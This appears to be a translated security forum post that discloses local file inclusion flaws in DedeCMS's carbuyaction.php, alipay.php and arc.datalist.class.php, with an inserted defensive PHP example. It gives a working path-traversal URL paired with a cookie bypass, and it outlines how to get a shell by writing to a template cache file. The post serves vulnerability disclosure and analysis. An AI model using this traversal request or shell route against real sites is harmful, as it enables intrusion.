The local file inclusion vulnerability still exists in carbuyaction.php.
Has this vulnerability been officially fixed?
Check the latest release package.
At the bottom of carbuyaction.php:
    elseif ($dopost == 'return')
    {
        $write_list = array('alipay', 'bank', 'cod', 'yeepay');
        if (in_array($code, $write_list))
        {
            require_once DEDEINC.'/payment/'.$code.'.php';
            $pay = new $code;
            $msg = $pay->respond();
            ShowMsg($msg, "javascript:;");
            exit();
        }
        else
        {
            exit('Error: File Type Can\'t Recognized!');
        }
    }

From the code above it looks as though the issue has been fixed, but open payment/alipay.php and look:
    /**
     * Response operation
     */
    function respond()
    {
        if (!empty($_POST))
        {
            foreach ($_POST as $key => $data)
            {
                $_GET[$key] = $data;
            }
        }
        /* Include the configuration file */
        require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';

I am not sure of the exact line number. And yes, the inclusion is still there...
Someone may ask: isn't the $code parameter validated? But did you notice that the path here is built from $_GET['code']?
Can the earlier $code be passed in some other way?
common.inc.php:

    foreach (Array('_GET', '_POST', '_COOKIE') as $_request)
    {
        // Every request parameter is registered as a global variable
        foreach ($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
    }

_POST, _COOKIE... Haha...
So it can still be used...
http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../
and add code=alipay to the cookie.
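The root cause above is that the whitelist is applied to $code while respond() builds its path from $_GET['code']. The following is an added example, not DedeCMS code and not part of the original post, that validates one value and builds the include path only from that value; safe_payment_file() and the temporary demo directory are hypothetical names.

```php
<?php
// Added example, not DedeCMS code. safe_payment_file() and the directory
// created under sys_get_temp_dir() are hypothetical names for illustration.

const PAYMENT_WHITELIST = ['alipay', 'bank', 'cod', 'yeepay'];

/**
 * Resolve a payment file from one validated value.
 * Returns the absolute path, or null if the code is not allowed.
 */
function safe_payment_file(string $baseDir, $code): ?string
{
    // Strict whitelist match on the exact value that will be used in the path.
    if (!is_string($code) || !in_array($code, PAYMENT_WHITELIST, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $code . '.php');
    // Defense in depth: the resolved file must stay inside the base directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temp directory standing in for DEDEDATA/payment.
$dir = sys_get_temp_dir() . '/payment_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . '/alipay.php', "<?php return ['partner' => 'demo'];");

// Constructed request: the cookie says "alipay", the query string does not.
$cookie = ['code' => 'alipay'];
$get    = ['code' => '../../somewhere/else'];

// The flawed pattern checks one source and includes from another.
// Here every candidate goes through the same check that builds the path.
foreach ([$cookie['code'], $get['code']] as $candidate) {
    $file = safe_payment_file($dir, $candidate);
    echo var_export($candidate, true), ' => ',
         $file === null ? 'rejected' : 'include ' . basename($file), PHP_EOL;
}
unlink($dir . '/alipay.php');
rmdir($dir);
```

In the DedeCMS flow this would mean passing the already validated value into respond() instead of letting it read $_GET['code'] again.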
Another bug is also reported; it can be triggered by accessing this URL directly:
http://www.dedecms.com/plus/carbuyaction.php?dopost=return&dsql=xx
It has no exploitation value for the moment; it is just a bug.
In addition, DedeCMS V5.6 has a local file inclusion in include/arc.datalist.class.php.
Code analysis: include/arc.datalist.class.php

    $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);
    if (file_exists(DEDEINC.'/code/datalist.'.$codefile.'.inc'))
    {
        require_once(DEDEINC.'/code/datalist.'.$codefile.'.inc');
    }

This includes a .inc file. A .inc file is the cache file written after the template tags have been parsed.
In memberalbum_edit.php:

    $dtp->LoadSource($addRow['imgurls']);

This lets us write our own data into the cache file. As long as you can post images and add local content, you can get a shell.